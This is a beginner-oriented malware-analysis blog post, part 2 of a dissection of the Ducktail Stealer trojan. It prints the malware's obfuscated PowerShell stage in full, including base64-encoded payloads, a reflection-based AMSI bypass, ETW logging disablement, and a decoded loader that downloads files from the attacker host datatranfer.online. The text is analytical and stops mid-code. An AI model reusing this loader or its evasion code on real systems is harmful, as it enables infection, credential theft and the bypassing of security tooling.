Open in app

Sign in

Write

Sign in

How to disecting your Remote Access Trojan for beginners: Ducktail Stealer Part 2.

Cristóbal Martínez
11 min readJun 19, 2024

--

We continue from part 1.

Well, the result of the last code will be another PowerShell, here is the full code:

$mfxtfsh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UmpiM1Z1ZENBdFozUWdNQ2tOQ2lBZ0lDQjdEUW9nSUNBZ0lDQWdJSFJ5ZVhzTkNpQWdJQ0FnSUNBZ0lDQWdJRWx1ZG05clpTMVhaV0pTWlhGMVpYTjBJQzFWVWtrZ0pGVnliQ0F0VDNWMFJtbHNaU0FrUkdWemRHbHVZWFJwYjI0N0RRb2dJQ0FnSUNBZ0lDQWdJQ0JYY21sMFpTMUliM04wSUNKRWIzZHViRzloWkNCemRXTmpaWE56SUNSVmNtd2lPdzBLSUNBZ0lDQWdJQ0FnSUNBZ1luSmxZV3M3RFFvZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ1kyRjBZMmdOQ2lBZ0lDQWdJQ0FnZXcwS0lDQWdJQ0FnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FrWHk1RmVHTmxjSFJwYjI0dVRXVnpjMkZuWlRzTkNpQWdJQ0FnSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWeWNtOXlJR1J2ZDI1c2IyRmtJR1pwYkdVZ0pGVnliQ0lOQ2lBZ0lDQWdJQ0FnSUNBZ0lDUmpiM1Z1ZENBdFBTQXhPdzBLRFFvZ0lDQWdJQ0FnSUNBZ0lDQlRkR0Z5ZEMxVGJHVmxjQ0F0Y3lBeE5Uc05DaUFnSUNBZ0lDQWdmUTBLSUNBZ0lIME5DbjBOQ2xkeWFYUmxMVWh2YzNRZ0lrTm9aV05ySUcxMWRHVjRkQ0k3RFFva2JYUjRYMk5vYVd4a0lEMGdUbVYzTFU5aWFtVmpkQ0JUZVhOMFpXMHVWR2h5WldGa2FXNW5MazExZEdWNEtDUm1ZV3h6WlN3Z0lsTlVRVkpVVlVGRElpazdEUW9rYlhSNElEMGdUbVYzTFU5aWFtVmpkQ0JUZVhOMFpXMHVWR2h5WldGa2FXNW5MazExZEdWNEtDUm1ZV3h6WlN3Z0lsSlZUazVKVGtjaUtUc05DaVJzYjJOclFXTnhkV2x5WldRZ1BTQWtiWFI0TGxkaGFYUlBibVVvTUNrN0RRb2tiRzlqYTBGamNYVnBjbVZrUTJocGJHUWdQU0FrYlhSNFgyTm9hV3hrTGxkaGFYUlBibVVvTUNrN0RRcHBaaUFvSkd4dlkydEJZM0YxYVhKbFpDQXRaWEVnSkhSeWRXVWdMV0Z1WkNBa2JHOWphMEZqY1hWcGNtVmtRMmhwYkdRZ0xXVnhJQ1IwY25WbEtTQU5DbnNOQ2lBZ0lDQWtiWFI0TGxKbGJHVmhjMlZOZFhSbGVDZ3BPdzBLSUNBZ0lGZHlhWFJsTFVodmMzUWdJazExZEdWNElHbHpJRzV2ZENCc2IyTnJaV1FpT3cwS0lDQWdJQ1JwYzFWQlEwOXdaVzRnUFNBb1IyVjBMVWwwWlcxUWNtOXdaWEowZVNCSVMweE5PbHhjVTA5R1ZGZEJVa1ZjWEUxcFkzSnZjMjltZEZ4Y1YybHVaRzkzYzF4Y1EzVnljbVZ1ZEZabGNuTnBiMjVjWEZCdmJHbGphV1Z6WEZ4VGVYTjBaVzBwTGtWdVlXSnNaVXhWUVRzTkNpQWdJQ0FnRFFvZ0lDQWdhV1lvSkdselZVRkRUM0JsYmlBdFpYRWdNU2tOQ2lBZ0lDQjdEUW9nSUNBZ0lDQWdJQ1JwYzFWQlEwOXdaVzRnUFNBb1IyVjBMVWwwWlcxUWNtOXdaWEowZVNCSVMweE5PbHhUYjJaMGQyRnlaVnhOYVdOeWIzTnZablJjVjJsdVpHOTNjMXhEZFhKeVpXNTBWbVZ5YzJsdmJseFFiMnhwWTJsbGMxeFRlWE4wWlcwcExrTnZibk5sYm5SUWNtOXRjSFJDWldoaGRtbHZja0ZrYldsdU93MEtJQ0FnSUgwTkNpQWdJQ0JYY21sMFpTMUliM04wSUNScGMxVkJRMDl3Wlc0N0RRb05DaUFnSUNCcFppZ2thWE5WUVVOUGNHVnVJQzFsY1NBd0tRMEtJQ0FnSUhzTkNpQWdJQ0FnSUNBZ1YzSnBkR1V0U0c5emRDQWlhMjhnWTJGdUlHSjVjR0Z6Y3lCMVlXTWlPdzBLSUNBZ0lDQWdJQ0JUZEdGeWRDMVFjbTlqWlhOeklDSmpiV1F1WlhobElpQXRWMmx1Wkc5M1UzUjViR1VnYUdsa1pHVnVJQzFXWlhKaUlISjFibUZ6SUMxQmNtZDFiV1Z1ZEV4cGMzUWdLQ0l2WXlCemRHRnlkQ0F2YldsdUlDSWlJSEJ2ZDJWeWMyaGxiR3d1WlhobElDMVhhVzVrYjNkVGRIbHNaU0JvYVdSa1pXNGdJQzFPYjB4dloyOGdMVTV2VUhKdlptbHNaU0F0UlhobFkzVjBhVzl1VUc5c2FXTjVJR0o1Y0dGemN5QXRSVzVqYjJSbFpFTnZiVzFoYm1RZ1NrRkNhRUZJYTBGa2QwSnFRVWhuUVdSQlFtOUJSMnRCV1dkQ2EwRkVNRUZYZDBKVVFVaHJRV04zUWpCQlIxVkJZbEZCZFVGR1VVRmFVVUkwUVVoUlFVeG5Ra1pCUnpSQldYZENka0ZIVVVGaFVVSjFRVWRqUVZoUlFUWkJSRzlCVVZGQ1ZFRkZUVUZUVVVKS1FVTTBRVkozUW14QlNGRkJWWGRDTUVGSVNVRmhVVUoxUVVkalFVdEJRbUpCUmsxQlpWRkNla0ZJVVVGYVVVSjBRVU0wUVZGM1FuWkJSelJCWkdkQ2JFRklTVUZrUVVKa1FVUnZRVTluUWtkQlNFbEJZbmRDZEVGRlNVRlpVVUo2UVVkVlFVNW5RVEJCUmsxQlpFRkNlVUZIYTBGaVowSnVRVU5uUVVsblFtdEJSV05CVWxGQ01rRkhUVUZUUVVKT1FVaFpRVlIzUWtoQlJUQkJaVUZDWVVGRlVVRlNaMEp2UVVVd1FWWkJRbFpCU0d0QlZGRkNkRUZHVlVGa2QwSk9RVWh2UVZsM1FqTkJSVFJCVm5kQ1QwRkhjMEZVVVVKSVFVVnZRV0ZCUWs5QlJ6QkJWbWRDYzBGRk1FRmhaMEpEUVVjd1FWUm5Ra1ZCUjFGQllrRkNUa0ZFU1VGVVVVRTVRVU5KUVV0UlFYQkJSSE5CUTJkQmEwRklVVUZrUVVKdFFVYzRRVmxuUVRsQlJuTkJWWGRDTlVGSVRVRmtRVUpzUVVjd1FVeG5RbFZCUjFWQlpVRkNNRUZETkVGU1VVSjFRVWROUVdKM1FtdEJSMnRCWW1kQ2JrRkdNRUZQWjBFMlFVVkZRVlYzUWtSQlJXdEJVMUZCZFVGRlkwRmFVVUl3UVVaTlFXUkJRbmxCUjJ0QlltZENia0ZEWjBGWGQwSlVRVWhyUVdOM1FqQkJSMVZCWWxGQmRVRkZUVUZpZDBKMVFVaFpRVnBSUW5sQlNGRkJXRkZCTmtGRWIwRlNaMEo1UVVjNFFXSlJRa05CUjBWQlkzZENiRUZFV1VGT1FVSlVRVWhSUVdOblFuQkJSelJCV25kQmIwRkRTVUZaVVVKSlFVWkpRVTFCUW1wQlJWRkJZbmRDTWtGRmQwRk5aMEpUUVVkblFWcEJRa2hCUlZsQlRVRkNha0ZITUVGU1owSXhRVVp2UVdKUlFsZEJTR3RCVkVGQ2RFRkVhMEZrVVVKcFFVVmpRV0pCUWpGQlJtOUJWWGRCTlVGSFowRlpkMEpJUVVkelFXUm5RbUZCUnpCQllrRkNla0ZHYjBGV2QwSlRRVWRuUVVsblFYQkJRMnRCVDNkQlMwRkRVVUZrVVVKNVFVZHJRVWxCUVRsQlEwRkJTMEZCYTBGSVVVRmtRVUp0UVVjNFFWbG5RV2RCUTNOQlNVRkJhMEZIUlVGbFVVSXpRVWROUVdWQlFqQkJSMmRCWVZGQ2FVRkhVVUZMVVVFM1FVRnZRVXBCUW1wQlJ6aEJaRkZDZFVGSVVVRkpRVUU1UVVOQlFVMVJRWGRCUkhOQlEyZENNMEZIWjBGaFVVSnpRVWRWUVV0QlFXdEJSMDFCWW5kQ01VRkhORUZrUVVGblFVTXdRVnAzUWpCQlEwRkJUVUZCY0VGQmIwRmxkMEZMUVVGclFVTm5RVXBCU0ZGQlkyZENOVUZJYzBGRFowRktRVUZyUVVwQlFtcEJSemhCWW1kQ01FRkhWVUZpWjBJd1FVTkJRVkJSUVdkQlJXdEJZbWRDTWtGSE9FRmhkMEpzUVVNd1FWWjNRbXhCUjBsQlZXZENiRUZJUlVGa1VVSnNRVWhOUVdSQlFXZEJRekJCVmxGQ2VVRkhhMEZKUVVGclFVaFZRV05uUW5CQlEwRkJURkZDVmtGSVRVRmFVVUpEUVVkRlFXTjNRbkJCUjAxQlZVRkNhRUZJU1VGamQwSndRVWMwUVZwM1FUZEJRVzlCUTFGQlNrRkZhMEZpWjBJeVFVYzRRV0YzUW14QlF6QkJVbEZDTkVGSVFVRmpaMEpzUVVoTlFXTjNRbkJCUnpoQlltZEJaMEZEVVVGWmQwSjJRVWMwUVdSQlFteEJSelJCWkVGQmRVRkhUVUZpZDBKMVFVaFJRVnBSUW5WQlNGRkJUM2RCUzBGQmEwRkRVVUpwUVVoSlFWcFJRbWhCUjNOQlQzZEJTMEZCYTBGbVVVRkxRVUZyUVZsM1FtaEJTRkZCV1hkQ2IwRkJiMEZEVVVJM1FVRnZRVU5SUVVwQlJtTkJZMmRDY0VGSVVVRmFVVUYwUVVWblFXSjNRbnBCU0ZGQlNVRkJhMEZHT0VGTVowSkdRVWhuUVZsM1FteEJTRUZCWkVGQ2NFRkhPRUZpWjBGMVFVVXdRVnBSUW5wQlNFMUJXVkZDYmtGSFZVRkRaMEZLUVVGclFVcEJRbXBCUnpoQlpGRkNkVUZJVVVGSlFVRjBRVVF3UVVsQlFYaEJSSE5CUTJkQlNrRkJhMEZWZDBJd1FVZEZRV05uUWpCQlF6QkJWWGRDYzBGSFZVRmFVVUozUVVOQlFVeFJRbnBCUTBGQlRWRkJNVUZFYzBGRFowRktRVWd3UVVOblFqbEJRVzlCSWlrN0RRb0pDV1Y0YVhRN0RRb2dJQ0FnZlEwS0lDQWdJR1ZzYzJVTkNpQWdJQ0I3RFFvZ0lDQWdJQ0FnSUZkeWFYUmxMVWh2YzNRZ0ltSjVjR0Z6Y3lCMVlXTWdjblZ1SUdOdFpDSTdEUW9nSUNBZ0lDQWdJRk4wWVhKMExYQnliMk5sYzNNZ0luQnZkMlZ5YzJobGJHd3VaWGhsSWlBZ0xVRnlaM1Z0Wlc1MFRHbHpkQ0FvSWkxRmJtTnZaR1ZrUTI5dGJXRnVaQ0JWZDBJd1FVZEZRV05uUWpCQlF6QkJWVUZDZVVGSE9FRlpkMEpzUVVoTlFXTjNRV2RCUTBsQldYZENkRUZIVVVGTVowSnNRVWhuUVZwUlFXbEJRMEZCVEZGQ1FrRklTVUZhZDBJeFFVY3dRVnBSUW5WQlNGRkJWRUZDY0VGSVRVRmtRVUZuUVVOblFVbG5RWFpCUjAxQlNVRkNkRUZIYzBGYVFVSndRVWhKUVVsQlFXbEJRMGxCVVhkQk5rRkdkMEZXZDBKd1FVYzBRVnBCUW5aQlNHTkJZM2RCWjBGR2QwRkpaMEZwUVVOQlFVcG5RV2RCUnpCQllYZENhMEZIYTBGalowRm5RVU5KUVVsblFrUkJSRzlCV0VGQ1dFRkhhMEZpWjBKclFVYzRRV1IzUW5wQlEwRkJXRUZDVkVGSWEwRmpkMEl3UVVkVlFXSlJRWHBCUkVsQldFRkJhVUZEU1VGSlFVRnRRVU5CUVZsM1FuWkJTRUZCWlZGQlowRkRTVUZKWjBKRVFVUnZRVmhCUWxoQlIydEJZbWRDYTBGSE9FRmtkMEo2UVVaM1FWVjNRalZCU0UxQlpFRkNiRUZITUVGTmQwRjVRVVozUVZwblFuWkJSMUZCWVVGQ2JFRkhkMEZqUVVKc1FVaEpRVXhuUW14QlNHZEJXbEZCYVVGRFNVRkpRVUZwUVVOSlFWRjNRVFpCUm5kQlZuZENjRUZITkVGYVFVSjJRVWhqUVdOM1FXZEJSbmRCVlhkQ05VRklUVUZrUVVKc1FVY3dRVTEzUVhsQlJuZEJTV2RCYVVGRFNVRkxVVUZuUVVNd1FWWjNRbkJCUnpSQldrRkNka0ZJWTBGVmQwSXdRVWhyUVdKQlFteEJRMEZCVTBGQ2NFRkhVVUZhUVVKc1FVYzBRVWxCUVdkQlF6QkJWbmRDYUVGSGEwRmtRVUUzUVVFOVBTSXBJQzFYYVc1a2IzZFRkSGxzWlNCSWFXUmtaVzRnSUMxWFlXbDBPdzBLSUNBZ0lDQWdJQ0FOQ2lBZ0lDQWdJQ0FnZDJocGJHVW9KSFJ5ZFdVcGV3MEtJQ0FnSUNBZ0lDQWdJQ0FnVjNKcGRHVXRTRzl6ZENBaVpHOTNibXh2WVdRZ1ptbHNaU0k3RFFvZ0lDQWdJQ0FnSUNBZ0lDQkViM2R1Ykc5aFpDMUdhV3hsUm5KdmJWVnliQ0F0VlhKc0lDSm9kSFJ3T2k4dlpHRjBZWFJ5WVc1bVpYSXViMjVzYVc1bEwyRndhUzltYVd4bFpHRjBZUzlrYkd3dk56TXpPV1ZoT1dJNFl6bGpNbUkzWTJOa01tSTNaamM1TnpjME5UWmlOREVpSUMxRVpYTjBhVzVoZEdsdmJpQWlRenBjVjJsdVpHOTNjeUJjVTNsemRHVnRNekpjY0hKdmNITjVjeTVrYkd3aU93MEtJQ0FnSUNBZ0lDQWdJQ0FnVjNKcGRHVXRTRzl6ZENBaVUzUmhjblFnVkdWdGNDSTdEUW9nSUNBZ0lDQWdJQ0FnSUNBa1kyOXRiV0Z1WkNBOUlDSXZZeUFpSWtNNlhGZHBibVJ2ZDNNZ1hGTjVjM1JsYlRNeVhHWnZaR2hsYkhCbGNpNWxlR1VpSWlJN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JYY21sMFpTMUliM04wSUNSamIyMXRZVzVrT3cwS0lDQWdJQ0FnSUNBZ0lDQWdKR050WkU1aGJXVWdQU0FpWTIxa0xtVjRaU0k3RFFvZ0lDQWdJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0FrWTIxa1RtRnRaVHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDUnRkSGhmY21GdVpHOXRUWFYwWlhnOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NU5kWFJsZUNna1ptRnNjMlVzSUNKTmVWSmhibVJ2YlUxMWRHVjRJaWs3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWtiWFI0WDNKaGJtUnZiVTExZEdWNExsZGhhWFJQYm1Vb01DazdEUW9nSUNBZ0lDQWdJQ0FnSUNCVGRHRnlkQzFUYkdWbGNDQXRVMlZqYjI1a2N5QXhPdzBLSUNBZ0lDQWdJQ0FnSUNBZ2QzSnBkR1V0YUc5emRDQWljM1JoY25RZ2NISnZZMlZ6Y3l3Z2QyRnBkQ0J6ZEc5d0lqc05DaUFnSUNBZ0lDQWdJQ0FnSUZOMFlYSjBMVkJ5YjJObGMzTWdKR050WkU1aGJXVWdMVUZ5WjNWdFpXNTBUR2x6ZENBb0pHTnZiVzFoYm1RcElDMVhhVzVrYjNkVGRIbHNaU0JJYVdSa1pXNDdEUW9nSUNBZ0lDQWdJQ0FnSUNCVGRHRnlkQzFUYkdWbGNDQXRVMlZqYjI1a2N5QXlPdzBLRFFvZ0lDQWdJQ0FnSUNBZ0lDQjBjbmw3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQTBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JzYjJOclFXTnhkV2x5WldRZ1BTQWtiWFI0TGxkaGFYUlBibVVvTUNrN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1YzSnBkR1V0U0c5emRDQWlURzlqYXlCemRHRjBkWE1nSkNna2JHOWphMEZqY1hWcGNtVmtLU0k3RFFvZ0lDQWdJQ0FnSUNBZ0lDQjlEUW9nSUNBZ0lDQWdJQ0FnSUNCallYUmphSHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnVjNKcGRHVXRTRzl6ZENBaVFXNGdaWEp5YjNJZ2IyTmpkWEp5WldRNklDUW9KRjh1UlhoalpYQjBhVzl1TGsxbGMzTmhaMlVwSWpzTkNpQWdJQ0FnSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnSUNBZ0RRb2dJQ0FnSUNBZ0lDQWdJQ0FrWTI5MWJuUlhZV2wwSUQwZ01UQTdEUW9nSUNBZ0lDQWdJQ0FnSUNCM2FHbHNaU2drWTI5MWJuUlhZV2wwSUMxbmRDQXdJQzFoYm1RZ0lDUnNiMk5yUVdOeGRXbHlaV1FnTFdWeElDUjBjblZsS1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCMGNubDdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUZOMFlYSjBMVk5zWldWd0lDMVRaV052Ym1SeklERTdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNSdGRIZ3VVbVZzWldGelpVMTFkR1Y0S0NrN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRk4wWVhKMExWTnNaV1Z3SUMxVFpXTnZibVJ6SURFN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JqYjNWdWRGZGhhWFF0TFRzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKR3h2WTJ0QlkzRjFhWEpsWkNBOUlDUnRkSGd1VjJGcGRFOXVaU2d3S1RzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1kyRjBZMmg3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pCYmlCbGNuSnZjaUJ2WTJOMWNuSmxaQ0F5T2lBa0tDUmZMa1Y0WTJWd2RHbHZiaTVOWlhOellXZGxLU0k3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHSnlaV0ZyT3cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNBZ0lDQWdKRzEwZUY5eVlXNWtiMjFOZFhSbGVDNVNaV3hsWVhObFRYVjBaWGdvS1RzTkNpQWdJQ0FnSUNBZ0lDQWdJR2xtS0NSamIzVnVkRmRoYVhRZ0xXZDBJREFwZXcwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUhkeWFYUmxMV2h2YzNRZ0lrOUxJanNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JpY21WaGF6c05DaUFnSUNBZ0lDQWdJQ0FnSUgwTkNnMEtEUW9nSUNBZ0lDQWdJQ0FnSUNCWGNtbDBaUzFJYjNOMElDSlVjbmtnWVdkaGFXNGlPdzBLSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnRFFvZ0lDQWdmUTBLRFFvTkNpQWdJQ0JUZEdGeWRDMVRiR1ZsY0NBdFUyVmpiMjVrY3lBeE1Ec05DZzBLRFFwOUlBMEtkSEo1ZXcwS0lDQWdJQ1J0ZEhndVVtVnNaV0Z6WlUxMWRHVjRLQ2s3RFFwOVkyRjBZMmg3RFFvZ0lDQWdJMkp2SUhGMVlRMEtmUTBLZEhKNWV3MEtJQ0FnSUNSdGRIaGZZMmhwYkdRdVVtVnNaV0Z6WlUxMWRHVjRLQ2s3SUEwS2ZXTmhkR05vZXcwS0lDQWdJQ05pYnlCeGRXRU5DbjBOQ2cwS1YzSnBkR1V0YUc5emRDQWlUMHNpT3cwS0RRb05DZzBLVjJGcGRDMUtiMklnSkdwdllnMEtVbVZ0YjNabExVcHZZaUFrYW05aURRbz0="));
$utsizbwrfw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SXcwS0l5QnZjR1Z1Um1sc1pTNXdjekVOQ2lNTkNnMEtJeUJFWldacGJtVWdkR2hsSUdacGJHVWdibUZ0WlNCaGJtUWdjR0YwYUhNTkNpUm1hV3hsVG1GdFpTQTlJQ0l3Tmpsa09HUm1ORE0xWVdNNU5qRTVaVEF6TmpFellqYzNZbU16Wm1abE9DNWtiMk40SWcwS0pIUmxiWEJHYjJ4a1pYSWdQU0JiVTNsemRHVnRMa2xQTGxCaGRHaGRPanBIWlhSVVpXMXdVR0YwYUNncE93MEtKR1pwYkdWUVlYUm9JRDBnU205cGJpMVFZWFJvSUMxUVlYUm9JQ1IwWlcxd1JtOXNaR1Z5SUMxRGFHbHNaRkJoZEdnZ0pHWnBiR1ZPWVcxbERRb2tabWxzWlZWeWJDQTlJQ0pvZEhSd09pOHZaR0YwWVhSeVlXNW1aWEl1YjI1c2FXNWxMMlpwYkdVdlpHOWpjeThrWm1sc1pVNWhiV1VpT3cwS0RRb2pJRU55WldGMFpTQmhJSE5qY21sd2RDQmliRzlqYXlCbWIzSWdkR2hsSUdwdllnMEtKSE5qY21sd2RFSnNiMk5ySUQwZ2V3MEtJQ0FnSUhCaGNtRnRJQ2dOQ2lBZ0lDQWdJQ0FnVzNOMGNtbHVaMTBrWm1sc1pWQmhkR2dzRFFvZ0lDQWdJQ0FnSUZ0emRISnBibWRkSkdacGJHVlZjbXdOQ2lBZ0lDQXBEUW9OQ2lBZ0lDQWpJRU5vWldOcklHbG1JSFJvWlNCbWFXeGxJR1Y0YVhOMGN3MEtJQ0FnSUdsbUlDZ3RibTkwSUNoVVpYTjBMVkJoZEdnZ0xWQmhkR2dnSkdacGJHVlFZWFJvS1NrZ2V3MEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wTGlCRWIzZHViRzloWkdsdVp5NHVMaUlOQ2lBZ0lDQWdJQ0FnRFFvZ0lDQWdJQ0FnSUNNZ1JHOTNibXh2WVdRZ2RHaGxJR1pwYkdVZ1puSnZiU0IwYUdVZ1ZWSk1EUW9nSUNBZ0lDQWdJRWx1ZG05clpTMVhaV0pTWlhGMVpYTjBJQzFWY21rZ0pHWnBiR1ZWY213Z0xVOTFkRVpwYkdVZ0pHWnBiR1ZRWVhSb0RRb2dJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pFYjNkdWJHOWhaQ0JqYjIxd2JHVjBaUzRpRFFvZ0lDQWdmUTBLRFFvZ0lDQWdJeUJQY0dWdUlIUm9aU0JtYVd4bElIZHBkR2dnZEdobElHUmxabUYxYkhRZ2NISnZaM0poYlEwS0lDQWdJRk4wWVhKMExWQnliMk5sYzNNZ0xVWnBiR1ZRWVhSb0lDUm1hV3hsVUdGMGFBMEtmUTBLRFFvaklGTjBZWEowSUhSb1pTQnFiMklOQ2lScWIySWdQU0JUZEdGeWRDMUtiMklnTFZOamNtbHdkRUpzYjJOcklDUnpZM0pwY0hSQ2JHOWpheUF0UVhKbmRXMWxiblJNYVhOMElDUm1hV3hsVUdGMGFDd2dKR1pwYkdWVmNtd05DZzBLSXlCRGFHVmpheUJwWmlCMGFHVWdhbTlpSUdseklISjFibTVwYm1jTkNtbG1JQ2drYW05aUxsTjBZWFJsSUMxbGNTQW5VblZ1Ym1sdVp5Y3BJSHNOQ2lBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pLYjJJZ2FYTWdjblZ1Ym1sdVp5NGdTbTlpSUVsRU9pQWtLQ1JxYjJJdVNXUXBJZzBLZlNCbGJITmxJSHNOQ2lBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pLYjJJZ1ptRnBiR1ZrSUhSdklITjBZWEowTGlJTkNuME5DZzBLRFFvTkNnMEtablZ1WTNScGIyNGdSRzkzYm14dllXUXRSbWxzWlVaeWIyMVZjbXdnZXcwS0lDQWdJSEJoY21GdElDZ05DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtWWEpzTEEwS0lDQWdJQ0FnSUNCYmMzUnlhVzVuWFNSRVpYTjBhVzVoZEdsdmJnMEtJQ0FnSUNrTkNnMEtJQ0FnSUNSamIzVnVkQ0E5SURFd093MEtJQ0FnSUhkb2FXeGxLQw=="));
$hyncamws=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGljLFN0YXRpYw=="));
$bovlwqvgbv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$bdvmg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHdQcm92aWRlcg=="));
$tjjjhwk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZQ=="));
$hmndchg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVy"));
$iceclpuhk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3k="));
$rxnhtw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsSW5zdGFuY2U="));
$zceyyso=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$ibzfakiwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9lbmFibGVk"));
$xrbgfk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$dwsmar=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVy"));
$fheudqhgrx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));
$qposrf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uQ29yZQ=="));
$bzehatvak=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$qauuxyvoyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsU3RhdGlj"));
$kyflk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$dgufplyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c2lJbml0RmFpbGVk"));
$aylsisopw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW0="));
$lgqhad=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));
$hxqcf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
$luqyrk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WjNoM1lta2dQU0FrZEhKMVpRPT0="));
$mrzdr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkhCd1kzTm0="));
Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($mrzdr
+ $luqyrk)))); $scklyswgmmajfkay = [Ref].Assembly.GetType(($hxqcf +
$lgqhad)).GetField(($aylsisopw + $dgufplyl),($kyflk + $qauuxyvoyl));
$scklyswgmmajfkay.SetValue($null,$ppcsfgxwbi);
[Reflection.Assembly]::LoadWithPartialName(($bzehatvak +
$qposrf)).GetType(($fheudqhgrx + $dwsmar)).GetField(($xrbgfk +
$ibzfakiwj),($zceyyso + $rxnhtw)).SetValue([Ref].Assembly.GetType(($iceclpuhk +
$hmndchg)).GetField(($tjjjhwk + $bdvmg),($kyflk +
$qauuxyvoyl)).GetValue($null),0); Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($utsizbwrfw + $mfxtfsh))));

This last code is somewhat larger, but if we look closely, the IOA is the same, cut code + 2 parts for the payload that must be joined, again I will get to the point, with the variables $utsizbwrfw + $mfxtfsh where the payload will be (hopefully final):

#
# openFile.ps1
#
# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "<http://datatranfer.online/file/docs/$fileName>";
# Create a script block for the job
$scriptBlock = {
    param (
        [string]$filePath,
        [string]$fileUrl
    )
    # Check if the file exists
    if (-not (Test-Path -Path $filePath)) {
        Write-Host "File does not exist. Downloading..."
        
        # Download the file from the URL
        Invoke-WebRequest -Uri $fileUrl -OutFile $filePath
        
        Write-Host "Download complete."
    }
    # Open the file with the default program
    Start-Process -FilePath $filePath
}
# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl
# Check if the job is running
if ($job.State -eq 'Running') {
    Write-Host "Job is running. Job ID: $($job.Id)"
} else {
    Write-Host "Job failed to start."
}
function Download-FileFromUrl {
    param (
        [string]$Url,
        [string]$Destination
    )
    $count = 10;
    while($count -gt 0)
    {
        try{
            Invoke-WebRequest -URI $Url -OutFile $Destination;
            Write-Host "Download success $Url";
            break;
        }
        catch
        {
            Write-Host $_.Exception.Message;
            Write-Host "Error download file $Url"
            $count -= 1;
            Start-Sleep -s 15;
        }
    }
}
Write-Host "Check mutext";
$mtx_child = New-Object System.Threading.Mutex($false, "STARTUAC");
